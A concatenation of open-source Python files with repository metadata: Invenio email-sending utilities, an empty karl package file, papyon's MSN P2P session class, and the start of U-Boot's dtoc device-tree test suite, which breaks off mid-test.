toaddr = remove_temporary_emails(toaddr)
if type(bccaddr) is str:
bccaddr = bccaddr.strip().split(',')
usebcc = len(toaddr) > 1 # More than one address, let's use Bcc in place of To
if copy_to_admin:
if CFG_SITE_ADMIN_EMAIL not in toaddr:
toaddr.append(CFG_SITE_ADMIN_EMAIL)
if CFG_DEVEL_SITE: # if we are on a development site, we don't want to send external e-mails
content = """
--------------------------------------------------------------
This message would have been sent to the following recipients:
%s
--------------------------------------------------------------
%s""" % (toaddr, content)
toaddr = CFG_SITE_ADMIN_EMAIL
usebcc = False
body = forge_email(fromaddr, toaddr, subject, content, html_content,
html_images, usebcc, header, footer, html_header,
html_footer, ln, charset, replytoaddr, attachments,
bccaddr)
_ = gettext_set_language(CFG_SITE_LANG)
if attempt_times < 1 or not toaddr:
try:
raise InvenioMiscUtilError(_('The system is not attempting to send an email from %s, to %s, with body %s.') % (fromaddr, toaddr, body))
except InvenioMiscUtilError, exc:
register_exception()
# log('ERR_MISCUTIL_NOT_ATTEMPTING_SEND_EMAIL', fromaddr, toaddr, body)
return False
sent = False
failure_reason = ''
failure_details = ''
while not sent and attempt_times > 0:
try:
server = smtplib.SMTP(CFG_MISCUTIL_SMTP_HOST, CFG_MISCUTIL_SMTP_PORT)
if debug_level > 2:
server.set_debuglevel(1)
else:
server.set_debuglevel(0)
if CFG_MISCUTIL_SMTP_TLS:
server.ehlo()
server.starttls()
server.ehlo()
if CFG_MISCUTIL_SMTP_USER and CFG_MISCUTIL_SMTP_PASS:
server.login(CFG_MISCUTIL_SMTP_USER, CFG_MISCUTIL_SMTP_PASS)
if isinstance(toaddr, basestring):
toaddr = [toaddr]
server.sendmail(fromaddr, toaddr + bccaddr, body)
server.quit()
sent = True
except (smtplib.SMTPException, socket.error) as e:
failure_reason = type(e).__name__
failure_details = str(e)
register_exception()
if debug_level > 1:
try:
raise InvenioMiscUtilError(_('Error in connecting to the SMPT server waiting %s seconds. Exception is %s, while sending email from %s to %s with body %s.') % (attempt_sleeptime, sys.exc_info()[0], fromaddr, toaddr, body))
except InvenioMiscUtilError, exc:
register_exception()
# log('ERR_MISCUTIL_CONNECTION_SMTP', attempt_sleeptime,
# sys.exc_info()[0], fromaddr, toaddr, body)
if not sent:
attempt_times -= 1
if attempt_times > 0: # sleep only if we shall retry again
sleep(attempt_sleeptime)
if not sent:
# report failure to the admin with the intended message, its
# sender and recipients
if forward_failures_to_admin:
# prepend '> ' to every line of the original message
quoted_body = '> ' + '> '.join(body.splitlines(True))
# define and fill in the report template
admin_report_subject = _('Error while sending an email: %s') % (subject)
admin_report_body = _("\nError while sending an email.\n"
"Reason: %s\n"
"Details: %s\n"
"Sender: \"%s\"\n"
"Recipient(s): \"%s\"\n\n"
"The content of the mail was as follows:\n"
"%s") % (failure_reason, failure_details,
fromaddr, ', '.join(toaddr),
quoted_body)
send_email(CFG_SITE_ADMIN_EMAIL, CFG_SITE_ADMIN_EMAIL,
admin_report_subject, admin_report_body,
forward_failures_to_admin=False)
try:
raise InvenioMiscUtilError(_('Error in sending email from %s to %s with body %s.') % (fromaddr, toaddr, body))
except InvenioMiscUtilError, exc:
register_exception()
# log('ERR_MISCUTIL_SENDING_EMAIL', fromaddr, toaddr, body)
return sent
def email_header(ln=CFG_SITE_LANG):
"""The header of the email
@param ln: language
@return: header as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard header
out = """%(hello)s
""" % {
'hello': _("Hello:")
}
return out
def email_html_header(ln=CFG_SITE_LANG):
"""The header of the email
@param ln: language
@return: header as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard header
out = """%(hello)s<br />
""" % {
'hello': _("Hello:")
}
return out
def email_footer(ln=CFG_SITE_LANG):
"""The footer of the email
@param ln: language
@return: footer as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard footer
out = """\n\n%(best_regards)s
--
%(sitename)s <%(siteurl)s>
%(need_intervention_please_contact)s <%(sitesupportemail)s>
""" % {
'sitename': CFG_SITE_NAME_INTL[ln],
'best_regards': _("Best regards"),
'siteurl': CFG_SITE_URL,
'need_intervention_please_contact': _("Need human intervention? Contact"),
'sitesupportemail': CFG_SITE_SUPPORT_EMAIL
}
return out
def email_html_footer(ln=CFG_SITE_LANG):
"""The html footer of the email
@param ln: language
@return: footer as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard footer
out = """<br /><br /><em>%(best_regards)s</em>
<hr />
<a href="%(siteurl)s"><strong>%(sitename)s</strong></a><br />
%(need_intervention_please_contact)s <a href="mailto:%(sitesupportemail)s">%(sitesupportemail)s</a>
""" % {
'sitename': CFG_SITE_NAME_INTL.get(ln, CFG_SITE_NAME),
'best_regards': _("Best regards"),
'siteurl': CFG_SITE_URL,
'need_intervention_please_contact': _("Need human intervention? Contact"),
'sitesupportemail': CFG_SITE_SUPPORT_EMAIL
}
return out
def forge_email(fromaddr, toaddr, subject, content, html_content='',
html_images=None, usebcc=False, header=None, footer=None,
html_header=None, html_footer=None, ln=CFG_SITE_LANG,
charset=None, replytoaddr="", attachments=None, bccaddr=""):
"""Prepare email. Add header and footer if needed.
@param fromaddr: [string] sender
@param toaddr: [string or list-of-strings] list of receivers (if string, then
receivers are separated by ',')
@param usebcc: [bool] True for using Bcc in place of To
@param subject: [string] subject of the email
@param content: [string] content of the email
@param html_content: [string] html version of the email
@param html_images: [dict] dictionary of image id, image path
@param header: [string] None for the default header
@param footer: [string] None for the default footer
@param ln: language
@charset: [string] the content charset. By default is None which means
to try to encode the email as ascii, then latin1 then utf-8.
@param replytoaddr: [string or list-of-strings] to be used for the
reply-to header of the email (if string, then
receivers are separated by ',')
@param attachments: list of paths of files to be attached. Alternatively,
every element of the list could be a tuple: (filename, mimetype)
@param bccaddr: [string or list-of-strings] to be used for BCC header of the email
(if string, then receivers are separated by ',')
@return: forged email as a string"""
if html_images is None:
html_images = {}
if header is None:
content = email_header(ln) + content
else:
content = header + content
if footer is None:
content += email_footer(ln)
else:
content += footer
if charset is None:
(content, content_charset) = guess_minimum_encoding(content)
else:
content_charset = charset
subject = get_mail_header(subject)
fromaddr = get_mail_header(fromaddr)
toaddr = get_mail_header(toaddr)
replytoaddr = get_mail_header(replytoaddr)
bccaddr = get_mail_header(bccaddr)
toaddr = remove_temporary_emails(toaddr)
if html_content:
if html_header is None:
html_content = email_html_header(ln) + html_content
else:
html_content = html_header + html_content
if html_footer is None:
html_content += email_html_footer(ln)
else:
html_content += html_footer
if charset is None:
(html_content, html_content_charset) = guess_minimum_encoding(html_content)
else:
html_content_charset = charset
msg_root = MIMEMultipart('alternative')
msg_root.preamble = 'This is a multi-part message in MIME format.'
msg_text = MIMEText(content, _charset=content_charset)
msg_root.attach(msg_text)
msg_text = MIMEText(html_content, 'html', _charset=html_content_charset)
if not html_images:
# No image? Attach the HTML to the root
msg_root.attach(msg_text)
else:
# Image(s)? Attach the HTML and image(s) as children of a
# "related" block
msg_related = MIMEMultipart('related')
msg_related.attach(msg_text)
for image_id, image_path in html_images.iteritems():
msg_image = MIMEImage(open(image_path, 'rb').read())
msg_image.add_header('Content-ID', '<%s>' % image_id)
msg_image.add_header('Content-Disposition', 'attachment', filename=os.path.split(image_path)[1])
msg_related.attach(msg_image)
msg_root.attach(msg_related)
else:
msg_root = MIMEText(content, _charset=content_charset)
if attachments:
from invenio.bibdocfile import _mimes, guess_format_from_url
old_msg_root = msg_root
msg_root = MIMEMultipart()
msg_root.attach(old_msg_root)
for attachment in attachments:
try:
if type(attachment) in (list, tuple):
attachment, mime = attachment
if mime is None:
## Automatic guessing of mimetype
mime = _mimes.guess_type(attachment)[0]
if mime is None:
ext = guess_format_from_url(attachment)
mime = _mimes.guess_type("foo" + ext)[0]
if not mime:
mime = 'application/octet-stream'
part = MIMEBase(*mime.split('/', 1))
part.set_payload(open(attachment, 'rb').read())
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(attachment))
msg_root.attach(part)
except:
register_exception(alert_admin=True, prefix="Can't attach %s" % attachment)
msg_root['From'] = fromaddr
if replytoaddr:
msg_root['Reply-To'] = replytoaddr
if usebcc:
msg_root['Bcc'] = toaddr
msg_root['To'] = 'Undisclosed.Recipients:'
if bccaddr:
msg_root['Bcc'] += ",%s" % (bccaddr,)
else:
msg_root['To'] = toaddr
if bccaddr:
msg_root['Bcc'] = bccaddr
msg_root['Date'] = formatdate(localtime=True)
msg_root['Subject'] = subject
msg_root['User-Agent'] = 'Invenio %s at %s' % (CFG_VERSION, CFG_SITE_URL)
return msg_root.as_string()
RE_NEWLINES = re.compile(r'<br\s*/?>|</p>', re.I)
RE_SPACES = re.compile(r'\s+')
RE_HTML_TAGS = re.compile(r'<.+?>')
def email_strip_html(html_content):
"""Strip html tags from html_content, trying to respect formatting."""
html_content = RE_SPACES.sub(' ', html_content)
html_content = RE_NEWLINES.sub('\n', html_content)
html_content = RE_HTML_TAGS.sub('', html_content)
html_content = html_content.split('\n')
out = StringIO()
out_format = AbstractFormatter(DumbWriter(out))
for row in html_content:
out_format.add_flowing_data(row)
out_format.end_paragraph(1)
return out.getvalue()
_RE_TEMPORARY_EMAIL = re.compile(CFG_TEMP_EMAIL_ADDRESS % r'.+?', re.I)
def remove_temporary_emails(emails):
"""
Removes the temporary emails (which are constructed randomly when user logs in
with an external authentication provider which doesn't supply an email
address) from an email list.
@param emails: email list (if string, then receivers are separated by ',')
@type emails: [str]|str
@rtype: list|str
"""
if type(emails) in (str, unicode):
emails = [email.strip() for email in emails.split(',') if email.strip()]
emails = [email for email in emails if not _RE_TEMPORARY_EMAIL.match(email)]
return ','.join(emails)
else:
return [email for email in emails if not _RE_TEMPORARY_EMAIL.match(email)]
def get_mail_header(value):
"""
Return a MIME-compliant header-string. Will join lists of strings
into one string with comma (,) as separator.
"""
if not isinstance(value, basestring):
value = ','.join(value)
try:
value = value.encode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
value = Header(value, 'utf-8')
return value
|
CERNDocumentServer/invenio
|
modules/miscutil/lib/mailutils.py
|
Python
|
gpl-2.0
| 22,698
|
# Copyright (C) 2008-2009 Open Society Institute
# Thomas Moroz: tmoroz@sorosny.org
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License Version 2 as published
# by the Free Software Foundation. You may not use, modify or distribute
# this program under any other version of the GNU General Public License.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# a package
|
boothead/karl
|
karl/views/__init__.py
|
Python
|
gpl-2.0
| 864
|
# -*- coding: utf-8 -*-
#
# papyon - a python client library for Msn
#
# Copyright (C) 2007 Ali Sabil <ali.sabil@gmail.com>
# Copyright (C) 2008 Richard Spiers <richard.spiers@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from papyon.event import EventsDispatcher
from papyon.msnp2p.constants import *
from papyon.msnp2p.SLP import *
from papyon.msnp2p.transport import *
from papyon.util.parsing import build_account
from papyon.util.timer import Timer
import papyon.util.element_tree as ElementTree
import gobject
import base64
import logging
import random
import uuid
import os
__all__ = ['P2PSession']
logger = logging.getLogger('papyon.msnp2p.session')
MAX_INT32 = 0x7fffffff
MAX_INT16 = 0x7fff
class P2PSession(gobject.GObject, EventsDispatcher, Timer):
__gsignals__ = {
"accepted" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
()),
"rejected" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
()),
"completed" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
(object,)),
"progressed" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
(object,)),
"canceled" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
()),
"disposed" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
())
}
def __init__(self, session_manager, peer, peer_guid=None, euf_guid="",
application_id=0, message=None):
gobject.GObject.__init__(self)
EventsDispatcher.__init__(self)
Timer.__init__(self)
self._session_manager = session_manager
self._transport_manager = session_manager._transport_manager
self._client = session_manager._client
self._peer = peer
self._peer_guid = peer_guid
self._euf_guid = euf_guid
self._application_id = application_id
self._completed = False
self._version = 1
if self._client.profile.client_id.supports_p2pv2 and \
peer.client_capabilities.supports_p2pv2:
self._version = 2
if message is not None:
self._id = message.body.session_id
self._call_id = message.call_id
self._cseq = message.cseq
self._branch = message.branch
self._incoming = True
else:
self._id = self._generate_id()
self._call_id = "{%s}" % uuid.uuid4()
self._cseq = 0
self._branch = "{%s}" % uuid.uuid4()
self._incoming = False
self._session_manager._register_session(self)
def _generate_id(self, max=MAX_INT32):
"""
Returns a random ID.
@return: a random integer between 1000 and sys.maxint
@rtype: integer
"""
return random.randint(1000, max)
@property
def id(self):
return self._id
@property
def incoming(self):
return self._incoming
@property
def completed(self):
return self._completed
@property
def call_id(self):
return self._call_id
@property
def peer(self):
return self._peer
@property
def peer_guid(self):
return self._peer_guid
@property
def local_id(self):
if self._version >= 2:
return build_account(self._client.profile.account,
self._client.machine_guid)
return self._client.profile.account
@property
def remote_id(self):
if self._version >= 2:
return build_account(self._peer.account, self._peer_guid)
return self._peer.account
def set_receive_data_buffer(self, buffer, size):
self._transport_manager.register_data_buffer(self.peer,
self.peer_guid, self.id, buffer, size)
def _invite(self, context):
body = SLPSessionRequestBody(self._euf_guid, self._application_id,
context, self._id)
message = SLPRequestMessage(SLPRequestMethod.INVITE,
"MSNMSGR:" + self.remote_id,
to=self.remote_id,
frm=self.local_id,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id)
message.body = body
self._send_slp_message(message)
self.start_timeout("response", 60)
def _transreq(self):
self._cseq = 0
body = SLPTransportRequestBody(self._id, 0, 1)
message = SLPRequestMessage(SLPRequestMethod.INVITE,
"MSNMSGR:" + self.remote_id,
to=self.remote_id,
frm=self.local_id,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id)
message.body = body
self._send_slp_message(message)
def _respond(self, status_code):
body = SLPSessionRequestBody(session_id=self._id, capabilities_flags=None,
s_channel_state=None)
self._cseq += 1
response = SLPResponseMessage(status_code,
to=self.remote_id,
frm=self.local_id,
cseq=self._cseq,
branch=self._branch,
call_id=self._call_id)
response.body = body
self._send_slp_message(response)
# close other end points so we are the only one answering
self._close_end_points(status_code)
def _accept(self):
self._respond(200)
def _decline(self, status_code):
self._respond(status_code)
self._dispose()
def _respond_transreq(self, transreq, status, body):
self._cseq += 1
response = SLPResponseMessage(status,
to=self.remote_id,
frm=self.local_id,
cseq=self._cseq,
branch=transreq.branch,
call_id=self._call_id)
response.body = body
self._send_slp_message(response)
def _accept_transreq(self, transreq, bridge, listening, nonce, local_ip,
local_port, extern_ip, extern_port):
body = SLPTransportResponseBody(bridge, listening, nonce, [local_ip],
local_port, [extern_ip], extern_port, self._id, 0, 1)
self._respond_transreq(transreq, 200, body)
def _decline_transreq(self, transreq):
body = SLPTransportResponseBody(session_id=self._id)
self._respond_transreq(transreq, 603, body)
self._dispose()
def _close(self, context=None, reason=None):
body = SLPSessionCloseBody(context=context, session_id=self._id,
reason=reason, s_channel_state=0)
self._cseq = 0
self._branch = "{%s}" % uuid.uuid4()
message = SLPRequestMessage(SLPRequestMethod.BYE,
"MSNMSGR:" + self.remote_id,
to=self.remote_id,
frm=self.local_id,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id)
message.body = body
self._send_slp_message(message)
self._dispose()
def _close_end_points(self, status):
"""Send BYE to other end points; this client already answered.
@param status: response we sent to the peer"""
if len(self._peer.end_points) > 0:
return # if the peer supports MPOP, let him do the work
for end_point in self._client.profile.end_points.values():
if end_point.id == self._client.machine_guid:
continue
self._close_end_point(end_point, status)
def _close_end_point(self, end_point, status):
reason = (status, self._client.machine_guid)
body = SLPSessionCloseBody(session_id=self._id, reason=reason,
s_channel_state=0)
self._cseq = 0
self._branch = "{%s}" % uuid.uuid4()
message = SLPRequestMessage(SLPRequestMethod.BYE,
"MSNMSGR:" + self._client.profile.account,
to=self._client.profile.account,
frm=self._peer.account,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id,
on_behalf=self._peer.account)
message.body = body
self._transport_manager.send_slp_message(self._client.profile,
end_point.id, self._application_id, message)
def _dispose(self):
logger.info("Session %s disposed" % self._id)
self.stop_all_timeout()
self._session_manager._transport_manager.cleanup(self.peer,
self.peer_guid, self._id)
self._session_manager._unregister_session(self)
self._emit("disposed")
def _send_slp_message(self, message):
self._transport_manager.send_slp_message(self.peer, self.peer_guid,
self._application_id, message)
def _send_data(self, data):
self._transport_manager.send_data(self.peer, self.peer_guid,
self._application_id, self._id, data)
def _on_slp_message_received(self, message):
if isinstance(message, SLPRequestMessage):
if isinstance(message.body, SLPSessionRequestBody):
self._on_invite_received(message)
elif isinstance(message.body, SLPSessionCloseBody):
self._on_bye_received(message)
else:
print "Unhandled signaling blob :", message
elif isinstance(message, SLPResponseMessage):
if isinstance(message.body, SLPSessionRequestBody):
self.stop_timeout("response")
if message.status == 200:
self._emit("accepted")
self._on_session_accepted()
elif message.status == 603:
self._emit("rejected")
self._on_session_rejected(message)
else:
print "Unhandled response blob :", message
def _on_data_sent(self, data):
logger.info("Session data transfer completed")
data.seek(0, os.SEEK_SET)
self._completed = True
self._emit("completed", data)
self.start_timeout("bye", 5)
def _on_data_received(self, data):
logger.info("Session data transfer completed")
data.seek(0, os.SEEK_SET)
self._completed = True
self._emit("completed", data)
self._close()
def _on_data_transferred(self, size):
self._emit("progressed", size)
def on_response_timeout(self):
self._close()
def on_bye_timeout(self):
self._dispose()
# Methods to implement in different P2P applications
def _on_invite_received(self, message):
pass
def _on_bye_received(self, message):
self._dispose()
def _on_session_accepted(self):
pass
def _on_session_rejected(self, message):
self._dispose()
# Utilities methods
def _emit(self, signal, *args):
self._dispatch("on_session_%s" % signal, *args)
self.emit(signal, *args)
gobject.type_register(P2PSession)
|
billiob/papyon
|
papyon/msnp2p/session.py
|
Python
|
gpl-2.0
| 11,748
|
#!/usr/bin/env python3
# SPDX-License-Identifier: GPL-2.0+
# Copyright (c) 2012 The Chromium OS Authors.
#
"""Tests for the dtb_platdata module
This includes unit tests for some functions and functional tests for the dtoc
tool.
"""
import collections
import os
import struct
import sys
import tempfile
import unittest
from dtoc import dtb_platdata
from dtb_platdata import conv_name_to_c
from dtb_platdata import get_compat_name
from dtb_platdata import get_value
from dtb_platdata import tab_to
from dtoc import fdt
from dtoc import fdt_util
from patman import test_util
from patman import tools
our_path = os.path.dirname(os.path.realpath(__file__))
HEADER = '''/*
* DO NOT MODIFY
*
* This file was generated by dtoc from a .dtb (device tree binary) file.
*/
#include <stdbool.h>
#include <linux/libfdt.h>'''
C_HEADER = '''/*
* DO NOT MODIFY
*
* This file was generated by dtoc from a .dtb (device tree binary) file.
*/
/* Allow use of U_BOOT_DEVICE() in this file */
#define DT_PLATDATA_C
#include <common.h>
#include <dm.h>
#include <dt-structs.h>
'''
C_EMPTY_POPULATE_PHANDLE_DATA = '''void dm_populate_phandle_data(void) {
}
'''
def get_dtb_file(dts_fname, capture_stderr=False):
"""Compile a .dts file to a .dtb
Args:
dts_fname: Filename of .dts file in the current directory
capture_stderr: True to capture and discard stderr output
Returns:
Filename of compiled file in output directory
"""
return fdt_util.EnsureCompiled(os.path.join(our_path, dts_fname),
capture_stderr=capture_stderr)
class TestDtoc(unittest.TestCase):
"""Tests for dtoc"""
@classmethod
def setUpClass(cls):
tools.PrepareOutputDir(None)
cls.maxDiff = None
@classmethod
def tearDownClass(cls):
tools._RemoveOutputDir()
def _WritePythonString(self, fname, data):
"""Write a string with tabs expanded as done in this Python file
Args:
fname: Filename to write to
data: Raw string to convert
"""
data = data.replace('\t', '\\t')
with open(fname, 'w') as fd:
fd.write(data)
def _CheckStrings(self, expected, actual):
"""Check that a string matches its expected value
If the strings do not match, they are written to the /tmp directory in
the same Python format as is used here in the test. This allows for
easy comparison and update of the tests.
Args:
expected: Expected string
actual: Actual string
"""
if expected != actual:
self._WritePythonString('/tmp/binman.expected', expected)
self._WritePythonString('/tmp/binman.actual', actual)
print('Failures written to /tmp/binman.{expected,actual}')
self.assertEquals(expected, actual)
def run_test(self, args, dtb_file, output):
dtb_platdata.run_steps(args, dtb_file, False, output, True)
def test_name(self):
"""Test conversion of device tree names to C identifiers"""
self.assertEqual('serial_at_0x12', conv_name_to_c('serial@0x12'))
self.assertEqual('vendor_clock_frequency',
conv_name_to_c('vendor,clock-frequency'))
self.assertEqual('rockchip_rk3399_sdhci_5_1',
conv_name_to_c('rockchip,rk3399-sdhci-5.1'))
def test_tab_to(self):
"""Test operation of tab_to() function"""
self.assertEqual('fred ', tab_to(0, 'fred'))
self.assertEqual('fred\t', tab_to(1, 'fred'))
self.assertEqual('fred was here ', tab_to(1, 'fred was here'))
self.assertEqual('fred was here\t\t', tab_to(3, 'fred was here'))
self.assertEqual('exactly8 ', tab_to(1, 'exactly8'))
self.assertEqual('exactly8\t', tab_to(2, 'exactly8'))
def test_get_value(self):
"""Test operation of get_value() function"""
self.assertEqual('0x45',
get_value(fdt.TYPE_INT, struct.pack('>I', 0x45)))
self.assertEqual('0x45',
get_value(fdt.TYPE_BYTE, struct.pack('<I', 0x45)))
self.assertEqual('0x0',
get_value(fdt.TYPE_BYTE, struct.pack('>I', 0x45)))
self.assertEqual('"test"', get_value(fdt.TYPE_STRING, 'test'))
self.assertEqual('true', get_value(fdt.TYPE_BOOL, None))
def test_get_compat_name(self):
"""Test operation of get_compat_name() function"""
Prop = collections.namedtuple('Prop', ['value'])
Node = collections.namedtuple('Node', ['props'])
prop = Prop(['rockchip,rk3399-sdhci-5.1', 'arasan,sdhci-5.1'])
node = Node({'compatible': prop})
self.assertEqual((['rockchip_rk3399_sdhci_5_1', 'arasan_sdhci_5_1']),
get_compat_name(node))
prop = Prop(['rockchip,rk3399-sdhci-5.1'])
node = Node({'compatible': prop})
self.assertEqual((['rockchip_rk3399_sdhci_5_1']),
get_compat_name(node))
prop = Prop(['rockchip,rk3399-sdhci-5.1', 'arasan,sdhci-5.1', 'third'])
node = Node({'compatible': prop})
self.assertEqual((['rockchip_rk3399_sdhci_5_1',
'arasan_sdhci_5_1', 'third']),
get_compat_name(node))
def test_empty_file(self):
"""Test output from a device tree file with no nodes"""
dtb_file = get_dtb_file('dtoc_test_empty.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
lines = infile.read().splitlines()
self.assertEqual(HEADER.splitlines(), lines)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
lines = infile.read().splitlines()
self.assertEqual(C_HEADER.splitlines() + [''] +
C_EMPTY_POPULATE_PHANDLE_DATA.splitlines(), lines)
def test_simple(self):
"""Test output from some simple nodes with various types of data"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_sandbox_i2c_test {
};
struct dtd_sandbox_pmic_test {
\tbool\t\tlow_power;
\tfdt64_t\t\treg[2];
};
struct dtd_sandbox_spl_test {
\tconst char * acpi_name;
\tbool\t\tboolval;
\tunsigned char\tbytearray[3];
\tunsigned char\tbyteval;
\tfdt32_t\t\tintarray[4];
\tfdt32_t\t\tintval;
\tunsigned char\tlongbytearray[9];
\tunsigned char\tnotstring[5];
\tconst char *\tstringarray[3];
\tconst char *\tstringval;
};
struct dtd_sandbox_spl_test_2 {
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /i2c@0 index 0 */
static struct dtd_sandbox_i2c_test dtv_i2c_at_0 = {
};
U_BOOT_DEVICE(i2c_at_0) = {
\t.name\t\t= "sandbox_i2c_test",
\t.platdata\t= &dtv_i2c_at_0,
\t.platdata_size\t= sizeof(dtv_i2c_at_0),
\t.parent_idx\t= -1,
};
/* Node /i2c@0/pmic@9 index 1 */
static struct dtd_sandbox_pmic_test dtv_pmic_at_9 = {
\t.low_power\t\t= true,
\t.reg\t\t\t= {0x9, 0x0},
};
U_BOOT_DEVICE(pmic_at_9) = {
\t.name\t\t= "sandbox_pmic_test",
\t.platdata\t= &dtv_pmic_at_9,
\t.platdata_size\t= sizeof(dtv_pmic_at_9),
\t.parent_idx\t= 0,
};
/* Node /spl-test index 2 */
static struct dtd_sandbox_spl_test dtv_spl_test = {
\t.boolval\t\t= true,
\t.bytearray\t\t= {0x6, 0x0, 0x0},
\t.byteval\t\t= 0x5,
\t.intarray\t\t= {0x2, 0x3, 0x4, 0x0},
\t.intval\t\t\t= 0x1,
\t.longbytearray\t\t= {0x9, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, 0x10,
\t\t0x11},
\t.notstring\t\t= {0x20, 0x21, 0x22, 0x10, 0x0},
\t.stringarray\t\t= {"multi-word", "message", ""},
\t.stringval\t\t= "message",
};
U_BOOT_DEVICE(spl_test) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test,
\t.platdata_size\t= sizeof(dtv_spl_test),
\t.parent_idx\t= -1,
};
/* Node /spl-test2 index 3 */
static struct dtd_sandbox_spl_test dtv_spl_test2 = {
\t.acpi_name\t\t= "\\\\_SB.GPO0",
\t.bytearray\t\t= {0x1, 0x23, 0x34},
\t.byteval\t\t= 0x8,
\t.intarray\t\t= {0x5, 0x0, 0x0, 0x0},
\t.intval\t\t\t= 0x3,
\t.longbytearray\t\t= {0x9, 0xa, 0xb, 0xc, 0x0, 0x0, 0x0, 0x0,
\t\t0x0},
\t.stringarray\t\t= {"another", "multi-word", "message"},
\t.stringval\t\t= "message2",
};
U_BOOT_DEVICE(spl_test2) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test2,
\t.platdata_size\t= sizeof(dtv_spl_test2),
\t.parent_idx\t= -1,
};
/* Node /spl-test3 index 4 */
static struct dtd_sandbox_spl_test dtv_spl_test3 = {
\t.longbytearray\t\t= {0x9, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, 0x10,
\t\t0x0},
\t.stringarray\t\t= {"one", "", ""},
};
U_BOOT_DEVICE(spl_test3) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test3,
\t.platdata_size\t= sizeof(dtv_spl_test3),
\t.parent_idx\t= -1,
};
/* Node /spl-test4 index 5 */
static struct dtd_sandbox_spl_test_2 dtv_spl_test4 = {
};
U_BOOT_DEVICE(spl_test4) = {
\t.name\t\t= "sandbox_spl_test_2",
\t.platdata\t= &dtv_spl_test4,
\t.platdata_size\t= sizeof(dtv_spl_test4),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_driver_alias(self):
"""Test output from a device tree file with a driver alias"""
dtb_file = get_dtb_file('dtoc_test_driver_alias.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_sandbox_gpio {
\tconst char *\tgpio_bank_name;
\tbool\t\tgpio_controller;
\tfdt32_t\t\tsandbox_gpio_count;
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /gpios@0 index 0 */
static struct dtd_sandbox_gpio dtv_gpios_at_0 = {
\t.gpio_bank_name\t\t= "a",
\t.gpio_controller\t= true,
\t.sandbox_gpio_count\t= 0x14,
};
U_BOOT_DEVICE(gpios_at_0) = {
\t.name\t\t= "sandbox_gpio",
\t.platdata\t= &dtv_gpios_at_0,
\t.platdata_size\t= sizeof(dtv_gpios_at_0),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_invalid_driver(self):
"""Test output from a device tree file with an invalid driver"""
dtb_file = get_dtb_file('dtoc_test_invalid_driver.dts')
output = tools.GetOutputFilename('output')
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['struct'], dtb_file, False, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_invalid {
};
''', data)
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['platdata'], dtb_file, False, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /spl-test index 0 */
static struct dtd_invalid dtv_spl_test = {
};
U_BOOT_DEVICE(spl_test) = {
\t.name\t\t= "invalid",
\t.platdata\t= &dtv_spl_test,
\t.platdata_size\t= sizeof(dtv_spl_test),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle(self):
"""Test output from a node containing a phandle reference"""
dtb_file = get_dtb_file('dtoc_test_phandle.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_source {
\tstruct phandle_2_arg clocks[4];
};
